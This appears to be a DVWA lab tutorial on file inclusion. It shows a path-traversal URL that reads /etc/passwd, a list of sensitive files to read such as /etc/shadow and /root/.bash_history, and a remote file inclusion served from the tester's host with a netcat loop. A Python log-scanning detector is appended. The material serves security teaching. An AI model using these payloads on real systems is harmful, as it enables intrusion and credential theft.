DVWA 1.9+: File Inclusion using Netcat as web server
This is part 5 of the DVWA Lab, and in this part we’ll cover file inclusion. So what is file inclusion and why is it a big deal?
When a web application allows the user to pass input directly to file streams or to upload files, it opens an attack vector for executing malicious code. If the included file is already on the target machine, the attack is called Local File Inclusion (LFI). If the file is external, it’s called Remote File Inclusion (RFI).
This is one more article of the DVWA series. You can grab all articles here.
Local File Inclusion
Open your browser, enter the DVWA URL, log in and navigate to the ‘file inclusion’ page.
If we click on the links file1.php, file2.php, file3.php and look at the generated URL, we can see that the filename is passed in the URL for each page. Let’s tamper with the URL:
http://192.168.231.110/vulnerabilities/fi/?page=../../../../../etc/passwd
Remember to set the security level to low.
The browser rendered the page with the contents of passwd. We can pry into other interesting files:
- /etc/issue
- /proc/version
- /etc/profile
- /etc/passwd
- /etc/shadow
- /root/.bash_history
- /var/log/dmessage
- /var/mail/root
- /var/spool/cron/crontabs/root
Remote File Inclusion
We’re going to try RFI on our target. First, let’s create a file to test:
$ nano rfi.php
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: netcat!

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
</head>
<body>
<h1>Fake DVWA page</h1>
<h2>Remote File Inclusion Test</h2>
</body>
</html>
We’re going to use the same method as before: first create the file with a corresponding HTTP header, then serve the file using Netcat as a simple web server:
# while true; do nc -l -p 80 < rfi.php; done;
Note the ‘#’. We’ll need root privileges to use port 80.
You can try the URL in your browser (http://your_kali_ip_address). Now, append this same URL to the DVWA address:
http://192.168.231.110/vulnerabilities/fi/?page=http://192.168.231.107/rfi.php
This is it. Target hacked.
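Both requests above leave a recognizable trace in the web server's access log. The following is an added example, not part of the original article: it scans constructed log lines for the page parameter and flags traversal or absolute paths as LFI and URL schemes as RFI. The log format, timestamps and the function names classify and scan are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed access-log lines (common log format) replaying this lab's requests.
SAMPLE_LOG = [
    '192.168.231.107 - - [01/Jan/2024:10:00:00 +0000] "GET /vulnerabilities/fi/?page=file1.php HTTP/1.1" 200 1523',
    '192.168.231.107 - - [01/Jan/2024:10:00:05 +0000] "GET /vulnerabilities/fi/?page=../../../../../etc/passwd HTTP/1.1" 200 2871',
    '192.168.231.107 - - [01/Jan/2024:10:00:09 +0000] "GET /vulnerabilities/fi/?page=http://192.168.231.107/rfi.php HTTP/1.1" 200 1650',
    '192.168.231.107 - - [01/Jan/2024:10:00:12 +0000] "GET /vulnerabilities/fi/?page=..%2F..%2Fetc%2Fissue HTTP/1.1" 200 1490',
]

REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.IGNORECASE)


def classify(value):
    """Return 'rfi', 'lfi' or None for one value of the include parameter."""
    # Decode until stable so percent-encoded separators are compared in plain form.
    for _ in range(3):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    if SCHEME_RE.match(value):
        return "rfi"  # a URL scheme means the include target is remote
    segments = value.replace("\\", "/").split("/")
    if ".." in segments or value.startswith("/"):
        return "lfi"  # traversal or absolute path leaves the intended directory
    return None


def scan(lines, param="page"):
    """Return (client_ip, kind, value) for every suspicious request line."""
    findings = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = match.group(1).partition("?")[2]
        for value in parse_qs(query).get(param, []):
            kind = classify(value)
            if kind:
                findings.append((line.split()[0], kind, value))
    return findings


if __name__ == "__main__":
    for ip, kind, value in scan(SAMPLE_LOG):
        print(f"{kind.upper()} attempt from {ip}: page={value}")
```

The legitimate file1.php request is not flagged; the other three constructed lines are reported with the decoded parameter value.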
Conclusion
In this article we’ve tackled File Inclusion vulnerabilities. Don’t miss the next article.